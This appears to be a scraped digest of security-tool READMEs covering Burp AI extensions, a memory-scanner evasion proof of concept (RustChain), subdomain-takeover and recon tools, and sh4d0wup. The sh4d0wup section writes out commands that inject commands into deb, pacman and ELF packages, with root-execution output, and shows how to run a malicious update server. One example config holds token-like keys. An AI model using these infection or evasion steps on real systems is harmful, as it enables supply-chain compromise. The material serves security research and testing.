    Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

    To run it locally, use:

    pre-commit run --all-files

    To setup pre-commit so that it runs before each commit, use:

    pre-commit install

    Building the docs

    To build the documentation, use:

    cd docs
    python3 -m venv venv
    . venv/bin/activate
    pip install -r requirements.txt
    make html

    How do I write my own module?

    Please refer to the documentation.

    Contributing

    Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

    However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



    ReconAIzer - A Burp Suite Extension To Add OpenAI (GPT) On Burp And Help You With Your Bug Bounty Recon To Discover Endpoints, Params, URLs, Subdomains And More!

    By: Zion3R


    ReconAIzer is a powerful Jython extension for Burp Suite that leverages OpenAI to help bug bounty hunters optimize their recon process. This extension automates various tasks, making it easier and faster for security researchers to identify and exploit vulnerabilities.

    Once installed, ReconAIzer add a contextual menu and a dedicated tab to see the results:


    Prerequisites

    • Burp Suite
    • Jython Standalone Jar

    Installation

    Follow these steps to install the ReconAIzer extension on Burp Suite:

    Step 1: Download Jython

    1. Download the latest Jython Standalone Jar from the official website: https://www.jython.org/download
    2. Save the Jython Standalone Jar file in a convenient location on your computer.

    Step 2: Configure Jython in Burp Suite

    1. Open Burp Suite.
    2. Go to the "Extensions" tab.
    3. Click on the "Extensions settings" sub-tab.
    4. Under "Python Environment," click on the "Select file..." button next to "Location of the Jython standalone JAR file."
    5. Browse to the location where you saved the Jython Standalone Jar file in Step 1 and select it.
    6. Wait for the "Python Environment" status to change to "Jython (version x.x.x) successfully loaded," where x.x.x represents the Jython version.

    Step 3: Download and Install ReconAIzer

    1. Download the latest release of ReconAIzer
    2. Open Burp Suite
    3. Go back to the "Extensions" tab in Burp Suite.
    4. Click the "Add" button.
    5. In the "Add extension" dialog, select "Python" as the "Extension type."
    6. Click on the "Select file..." button next to "Extension file" and browse to the location where you saved the ReconAIzer.py file in Step 3.1. Select the file and click "Open."
    7. Make sure the "Load" checkbox is selected and click the "Next" button.
    8. Wait for the extension to be loaded. You should see a message in the "Output" section stating that the ReconAIzer extension has been successfully loaded.

    Congratulations! You have successfully installed the ReconAIzer extension in Burp Suite. You can now start using it to enhance your bug bounty hunting experience.

    Once it's done, you must configure your OpenAI API key on the "Config" tab under "ReconAIzer" tab.

    Feel free to suggest prompts improvements or anything you would like to see on ReconAIzer!

    Happy bug hunting!



    Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type

    By: Zion3R


    burpgpt leverages the power of AI to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI model specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.

    The extension generates an automated security report that summarises potential security issues based on the user's prompt and real-time data from Burp-issued requests. By leveraging AI and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.

    [!WARNING] Data traffic is sent to OpenAI for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.

    [!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.

    [!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected GPT model. This targeted approach will help ensure the GPT model generates accurate and valuable results for your security analysis.

    Β 

    Features

    • Adds a passive scan check, allowing users to submit HTTP data to an OpenAI-controlled GPT model for analysis through a placeholder system.
    • Leverages the power of OpenAI's GPT models to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.
    • Enables granular control over the number of GPT tokens used in the analysis by allowing for precise adjustments of the maximum prompt length.
    • Offers users multiple OpenAI models to choose from, allowing them to select the one that best suits their needs.
    • Empowers users to customise prompts and unleash limitless possibilities for interacting with OpenAI models. Browse through the Example Use Cases for inspiration.
    • Integrates with Burp Suite, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.
    • Provides troubleshooting functionality via the native Burp Event Log, enabling users to quickly resolve communication issues with the OpenAI API.

    Requirements

    1. System requirements:
    • Operating System: Compatible with Linux, macOS, and Windows operating systems.

    • Java Development Kit (JDK): Version 11 or later.

    • Burp Suite Professional or Community Edition: Version 2023.3.2 or later.

      [!IMPORTANT] Please note that using any version lower than 2023.3.2 may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.

    1. Build tool:
    • Gradle: Version 6.9 or later (recommended). The build.gradle file is provided in the project repository.
    1. Environment variables:
    • Set up the JAVA_HOME environment variable to point to the JDK installation directory.

    Please ensure that all system requirements, including a compatible version of Burp Suite, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.

    Installation

    1. Compilation

    1. Ensure you have Gradle installed and configured.

    2. Download the burpgpt repository:

      git clone https://github.com/aress31/burpgpt
      cd .\burpgpt\
    3. Build the standalone jar:

      ./gradlew shadowJar

    2. Loading the Extension Into Burp Suite

    To install burpgpt in Burp Suite, first go to the Extensions tab and click on the Add button. Then, select the burpgpt-all jar file located in the .\lib\build\libs folder to load the extension.

    Usage

    To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:

    1. Enter a valid OpenAI API key.
    2. Select a model.
    3. Define the max prompt size. This field controls the maximum prompt length sent to OpenAI to avoid exceeding the maxTokens of GPT models (typically around 2048 for GPT-3).
    4. Adjust or create custom prompts according to your requirements.

    Once configured as outlined above, the Burp passive scanner sends each request to the chosen OpenAI model via the OpenAI API for analysis, producing Informational-level severity findings based on the results.

    Prompt Configuration

    burpgpt enables users to tailor the prompt for traffic analysis using a placeholder system. To include relevant information, we recommend using these placeholders, which the extension handles directly, allowing dynamic insertion of specific values into the prompt:

    Placeholder Description
    {REQUEST} The scanned request.
    {URL} The URL of the scanned request.
    {METHOD} The HTTP request method used in the scanned request.
    {REQUEST_HEADERS} The headers of the scanned request.
    {REQUEST_BODY} The body of the scanned request.
    {RESPONSE} The scanned response.
    {RESPONSE_HEADERS} The headers of the scanned response.
    {RESPONSE_BODY} The body of the scanned response.
    {IS_TRUNCATED_PROMPT} A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings.

    These placeholders can be used in the custom prompt to dynamically generate a request/response analysis prompt that is specific to the scanned request.

    [!NOTE] > Burp Suite provides the capability to support arbitrary placeholders through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of the prompts.

    Example Use Cases

    The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt, which enables users to tailor their web traffic analysis to meet their specific needs.

    • Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:

      Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:

      Web Application URL: {URL}
      Crypto Library Name: {CRYPTO_LIBRARY_NAME}
      CVE Number: CVE-{CVE_NUMBER}
      Request Headers: {REQUEST_HEADERS}
      Response Headers: {RESPONSE_HEADERS}
      Request Body: {REQUEST_BODY}
      Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
    • Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:

      Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:

      Web Application URL: {URL}
      Biometric Authentication Request Headers: {REQUEST_HEADERS}
      Biometric Authentication Response Headers: {RESPONSE_HEADERS}
      Biometric Authentication Request Body: {REQUEST_BODY}
      Biometric Authentication Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
    • Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:

      Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:

      Serverless Function A URL: {URL}
      Serverless Function B URL: {URL}
      Serverless Function A Request Headers: {REQUEST_HEADERS}
      Serverless Function B Response Headers: {RESPONSE_HEADERS}
      Serverless Function A Request Body: {REQUEST_BODY}
      Serverless Function B Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
    • Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:

      Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:

      Web Application URL: {URL}
      SPA Framework Name: {SPA_FRAMEWORK_NAME}
      Request Headers: {REQUEST_HEADERS}
      Response Headers: {RESPONSE_HEADERS}
      Request Body: {REQUEST_BODY}
      Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.

    Roadmap

    • Add a new field to the Settings panel that allows users to set the maxTokens limit for requests, thereby limiting the request size.
    • Add support for connecting to a local instance of the AI model, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.
    • Retrieve the precise maxTokens value for each model to transmit the maximum allowable data and obtain the most extensive GPT response possible.
    • Implement persistent configuration storage to preserve settings across Burp Suite restarts.
    • Enhance the code for accurate parsing of GPT responses into the Vulnerability model for improved reporting.

    Project Information

    The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.

    Sponsor

    If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee

    for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.

    Reporting Issues

    Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!

    Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!

    Contributing

    Looking to make a splash with your mad coding skills?

    Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!

    License

    See LICENSE.



    RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints

    By: Zion3R


    This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique check out the original project Gargoyle. x64 only.

    The idea is to set up a hardware breakpoint in kernel32!Sleep and a new top-level filter to handle the exception. When Sleep is called, the exception filter function set before is triggered, allowing us to call the ROP chain without the need of using classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well known dlls.

    The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.


    The overview of the process is as follows:

    • We use SetUnhandledExceptionFilter to set a new exception filter function.
    • SetThreadContext is used in order to set a hardware breakpoint on kernel32!Sleep.
    • We call Sleep, triggering the hardware breakpoint and driving the execution flow towards our exception filter function.
    • The ROP chain is called from the exception filter function, allowing to change the current memory page protection to N/A. Then SleepEx is called. Finally, the ROP chain restores the RX memory protection and the normal execution continues.

    This process repeats indefinitely.

    As it can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.

    Compilation

    Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

    C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

    After that, simply compile the code and run the tool:

    C:\Users\User\Desktop\RustChain> cargo build
    C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe

    Limitations

    This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).

    Credits



    Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

    By: Zion3R

    OWASP Global AppSec Dublin - talk and demo


    Features

    • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
    • scan Cloudflare for vulnerable DNS records
    • take over vulnerable subdomains yourself before attackers and bug bounty researchers
    • automatically create known issues in Bugcrowd or HackerOne
    • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
    • manual scans of cloud accounts with no installation

    Installation

    Collaboration

    We welcome collaborators! Please see the OWASP Domain Protect website for more details.

    Documentation

    Manual scans - AWS
    Manual scans - CloudFlare
    Architecture
    Database
    Reports
    Automated takeover optional feature
    Cloudflare optional feature
    Bugcrowd optional feature
    HackerOne optional feature
    Vulnerability types
    Vulnerable A records (IP addresses) optional feature
    Requirements
    Installation
    Slack Webhooks
    AWS IAM policies
    CI/CD
    Development
    Code Standards
    Automated Tests
    Manual Tests
    Conference Talks and Blog Posts

    Limitations

    This tool cannot guarantee 100% protection against subdomain takeovers.



    Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework


    Signing-key abuse and update exploitation framework.

    % docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
    Usage: sh4d0wup [OPTIONS] <COMMAND>

    Commands:
    bait Start a malicious update server
    front Bind a http/https server but forward everything unmodified
    infect High level tampering, inject additional commands into a package
    tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
    keygen Generate signing keys with the given parameters
    sign Use signing keys to generate signatures
    hsm Interact with hardware signing keys
    build Compile an attack based on a plot
    check Check if the plot can still execute correctly against the configured image
    req Emulate a http request to test routing and selectors
    completion s Generate shell completions
    help Print this message or the help of the given subcommand(s)

    Options:
    -v, --verbose... Increase logging output (can be used multiple times)
    -q, --quiet... Reduce logging output (can be used multiple times)
    -h, --help Print help information
    -V, --version Print version information

    What are shadow updates?

    Have you ever wondered if the update you downloaded is the same one everybody else gets or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.

    sh4d0wup is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors so it matches only if eg. the user-agent matches a pattern or if the client is connecting from a specific ip address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.

    Compile a plot

    Some plots are more complex to run than others, to avoid long startup time due to downloads and artifact patching, you can build a plot in advance. This also allows to create signatures in advance.

    sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

    Run a plot

    This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.

    sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

    You can find examples here:

    Infect an artifact

    sh4d0wup infect elf

    % sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
    [2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
    [2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
    [2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
    [2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
    % ./a.out help
    uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
    Usage: a.out [OPTIONS] <COMMAND>

    Commands:
    bait Start a malicious update server
    infect High level tampering, inject additional commands into a package
    tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
    keygen Generate signing keys with the given parameters
    sign Use signing keys to generate signatures
    hsm Intera ct with hardware signing keys
    build Compile an attack based on a plot
    check Check if the plot can still execute correctly against the configured image
    completions Generate shell completions
    help Print this message or the help of the given subcommand(s)

    Options:
    -v, --verbose... Turn debugging information on
    -h, --help Print help information

    sh4d0wup infect pacman

    % sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
    [2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
    % sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
    loading packages...
    resolving dependencies...
    looking for conflicting packages...

    Packages (1) sh4d0wup-0.2.0-2

    Total Installed Size: 13.36 MiB
    Net Upgrade Size: 0.00 MiB

    :: Proceed with installation? [Y/n]
    (1/1) checking keys in keyring [#######################################] 100%
    (1/1) checking package integrity [#######################################] 100%
    (1/1) loading package files [#######################################] 100%
    (1/1) checking for file conflic ts [#######################################] 100%
    (1/1) checking available disk space [#######################################] 100%
    :: Processing package changes...
    (1/1) upgrading sh4d0wup [#######################################] 100%
    uid=0(root) gid=0(root) groups=0(root)
    :: Running post-transaction hooks...
    (1/2) Arming ConditionNeedsUpdate...
    (2/2) Notifying arch-audit-gtk

    sh4d0wup infect deb

    % sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
    [2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
    % sudo apt install ./apt_2.2.4-1_amd64.deb
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
    Suggested packages:
    apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
    Recommended packages:
    ca-certificates
    The following packages will be upgraded:
    apt
    1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
    Need to get 0 B/1491 kB of archives.
    After this operation, 0 B of additional disk space will be used.
    Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
    debconf: de laying package configuration, since apt-utils is not installed
    (Reading database ... 6661 files and directories currently installed.)
    Preparing to unpack /apt_2.2.4-1_amd64.deb ...
    Unpacking apt (2.2.4-1) over (2.2.4) ...
    Setting up apt (2.2.4-1) ...
    uid=0(root) gid=0(root) groups=0(root)
    Processing triggers for libc-bin (2.31-13+deb11u5) ...

    sh4d0wup infect oci

    Bruteforce git commit partial collisions

    Here's a short oneliner on how to take the latest commit from a git repository, send it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix and then inserts the new commit back into the repository on your local computer:

    % git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin

    This may take some time, eventually it shows a commit id that you can use to create a new branch:

    git show 777754fde8...
    git branch some-name 777754fde8...


    Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

    How it works β€’ Installation β€’ Usage β€’ MODES β€’ For Developers β€’ Credits

    Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

    SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

    In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

    SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

    [Thanks ChatGPT for the Description]


    How it Works ?

    This tool mainly performs 3 tasks

    1. Effective Subdomain Enumeration from Various Tools
    2. Get URLs with open HTTP and HTTPS service.
    3. Run a Nuclei and other scans on previous output So basically, this is an autmation script for your initial recon in bugbounty

    Install SCRIPTKIDDI3

    SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-

    git clone https://github.com/thecyberneh/scriptkiddi3.git
    cd scriptkiddi3
    bash installer.sh

    Usage

    scriptkiddi3 -h

    This will display help for the tool. Here are all the switches it supports.

    Vulnerability Detection with Nuclei, and Scan for SUBDOMAINE TAKEOVER [FLAGS:] [TARGET:] -d, --domain target domain to scan [CONFIG:] -c, --config path of your configuration file for subfinder [HELP:] -h, --help to get help menu [UPDATE:] -u, --update to update tool [Examples:] Run scriptkiddi3 in full Exploitation mode scriptkiddi3 -m EXP -d target.com Use your own CONFIG file for subfinder scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode scriptkiddi3 -m SUB -d target.com Run scriptkiddi3 in URL ENUMERATION mode scriptkiddi3 -m SUB -d target.com " dir="auto">
    [ABOUT:]
    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
    A recon and initial vulnerability detection tool built using shell script and open source tools.


    [Usage:]
    scriptkiddi3 [MODE] [FLAGS]
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    [MODES:]
    ['-m'/'--mode']
    Available Options for MODE:
    SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    URL | url Run scriptkiddi3 in URL ENUMERATION mode
    EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


    Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
    Vulnerability Detection with Nuclei,
    an d Scan for SUBDOMAINE TAKEOVER

    [FLAGS:]
    [TARGET:] -d, --domain target domain to scan

    [CONFIG:] -c, --config path of your configuration file for subfinder

    [HELP:] -h, --help to get help menu

    [UPDATE:] -u, --update to update tool

    [Examples:]
    Run scriptkiddi3 in full Exploitation mode
    scriptkiddi3 -m EXP -d target.com


    Use your own CONFIG file for subfinder
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com


    Run scriptkiddi3 in URL ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com

    MODES

    1. FULL EXPLOITATION MODE

    Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

      scriptkiddi3 -m EXP -d target.com

    FULL EXPLOITATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • Effective URL Enumeration ( HTTP and HTTPs service )
    • Run Vulnerability Detection with Nuclei
    • Subdomain Takeover Test on previous results

    2. SUBDOMAIN ENUMERATION MODE

    Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

      scriptkiddi3 -m SUB -d target.com

    SUBDOMAIN ENUMERATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • You can use this mode if you only want to get subdomains from this tool or we can say Automation of Subdmain Enumeration by different tools

    3. URL ENUMERATION MODE

    Run scriptkiddi3 in URL ENUMERATION MODE

      scriptkiddi3 -m URL -d target.com

    URL ENUMERATION MODE contains following functions

    • Same Feature as SUBDOMAIN ENUMERATION MODE but also identifies HTTP or HTTPS service

    Using your own CONFIG File for subfinder

      scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

    You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder

    Updating tool to latest version You can run following command to update tool

      scriptkiddi3 -u

    An Example of config.yaml

    binaryedge:
    - 0bf8919b-aab9-42e4-9574-d3b639324597
    - ac244e2f-b635-4581-878a-33f4e79a2c13
    censys:
    - ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
    certspotter: []
    passivetotal:
    - sample-email@user.com:sample_password
    securitytrails: []
    shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    github:
    - ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
    - ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
    zoomeye:
    - zoomeye_username:zoomeye_password

    For Developers

    If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

    If you have any other queries, you can always contact me on Twitter(thecyberneh)

    Credits

    I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



    QuadraInspect - Android Framework That Integrates AndroPass, APKUtil, And MobFS, Providing A Powerful Tool For Analyzing The Security Of Android Applications


    The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines three powerful tools - AndroPass, APKUtil, RMS, and MobFS - to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.

    QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass is a tool that focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil is a tool that extracts valuable information from an APK file. Lastly, MobFS and RMS facilitates the analysis of an application's filesystem by mounting its storage in a virtual environment.

    By combining these three tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all three tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.


    Requirements

    • Windows, Linux or Mac
    • NodeJs installed
    • Python 3 installed
    • OpenSSL-3 installed
    • Wkhtmltopdf installed

    Installation

    To install the tools you need to: First : git clone https://github.com/morpheuslord/QuadraInspect

    Second Open a Administrative cmd or powershell (for Mobfs setup) and run : pip install -r requirements.txt && python3 main.py

    Third : Once QuadraInspect loads run this command QuadraInspect Main>> : START install_tools

    The tools will be downloaded to the tools directory and also the setup.py and setup.bat commands will run automatically for the complete installation.

    Usage

    Each module has a help function so that the commands and the discriptions are detailed and can be altered for operation.

    These are the key points that must be addressed for smooth working:

    • The APK file or target must be declared before starting any attack
    • The Attacks are seperate entities combined via this framework doing research on how to use them is recommended.
    • The APK file can be ether declared ether using args or using SET target withing the tool.
    • The target APK file must be placed in the target folder as all the tool searches for the target file with that folder.

    Modes

    There are 2 modes:

    |
    └─> F mode
    └─> A mode

    F mode

    The f mode is a mode where you get the active interface for using the interactive vaerion of the framework with the prompt, etc.

    F mode is the normal mode and can be used easily

    A mode

    A mode or argumentative mode takes the input via arguments and runs the commands without any intervention by the user this is limited to the main menu in the future i am planning to extend this feature to even the encorporated codes.

    python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks

    Main Module

    the main menu of the entire tool has these options and commands:

    Command Discription
    SET target SET the name of the targetfile
    START install_tools If not installed this will install the tools
    LIST tools_name List out the Tools Intigrated
    START apkleaks Use APKLeaks tool
    START mobfs Use MOBfs for dynamic and static analysis
    START andropass Use AndroPass APK analizer
    help Display help menu
    SHOW banner Display banner
    quit Quit the program

    As mentioned above the target must be set before any tool is used.

    Apkleaks menu

    The APKLeaks menu is also really straight forward and only a few things to consider:

    • The options SET output and SET json-out takes file names not the actual files it creates an output in the result directory.
    • The SET pattern option takes a name of a json pattern file. The JSON file must be located in the pattern directory
    OPTION SET Value
    SET output Output for the scan data file name
    SET arguments Additional Disassembly arguments
    SET json-out JSON output file name
    SET pattern The pre-searching pattern for secrets
    help Displays help menu
    return Return to main menu
    quit Quit the tool

    Mobfs

    Mobfs is pritty straight forward only the port number must be taken care of which is by default on port 5000 you just need to start the program and connect to it on 127.0.0.1:5000 over your browser.

    AndroPass

    AndroPass is also really straight forward it just takes the file as input and does its job without any other inputs.

    Architecture:

    The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:

    • Core module: The core module will provide the basic functionality of the framework, such as command-line interface, input/output handling, and logging.
    • Static analysis module: The static analysis module will be responsible for analyzing the structure and content of APK files, such as the manifest file, resources, and code.
    • Dynamic analysis module: The dynamic analysis module will be responsible for analyzing the behavior of APK files, such as network traffic, API calls, and file system interactions.
    • Reverse engineering module: The reverse engineering module will be responsible for decompiling and analyzing the source code of APK files.
    • Vulnerability testing module: The vulnerability testing module will be responsible for testing the security of APK files, such as identifying vulnerabilities and exploits.

    Adding more

    Currentluy there only 3 but if wanted people can add more tools to this these are the things to be considered:

    • Installer function
    • Seperate tool function
    • Main function

    Installer Function

    • Must edit in the config/installer.py
    • The things to consider in the installer is the link for the repository.
    • keep the cloner and the directory in a try-except condition to avoide errors.
    • choose an appropriate command for further installation

    Seperate tool function

    • Must edit in the config/mobfs.py , config/androp.py, config/apkleaks.py
    • Write a new function for the specific tool
    • File handeling is up to you I recommend passing the file name as an argument and then using the name to locate the file using the subprocess function
    • the tools must also recommended to be in a try-except condition to avoide unwanted errors.

    Main Function

    • A new case must be added to the switch function to act as a main function holder
    • the help menu listing and commands are up to your requirements and comfort

    If wanted you could do your upgrades and add it to this repository for more people to use kind of growing this tool.



    Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database


    Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and it's Probes, WPS information and a global view of all the APs seen.

               _   __  _             _  _     
    __ __(_) / _|(_) __| || |__
    \ \ /\ / /| || |_ | | / _` || '_ \
    \ V V / | || _|| | | (_| || |_) |
    \_/\_/ |_||_| |_| _____ \__,_||_.__/
    |_____|
    by r4ulcl

    Features

    • Displays if a network is cloaked (hidden) even if you have the ESSID.
    • Shows a detailed table of connected clients and their respective APs.
    • Identifies client probes connected to APs, providing insight into potential security risks usin Rogue APs.
    • Extracts handshakes for use with hashcat, facilitating password cracking.
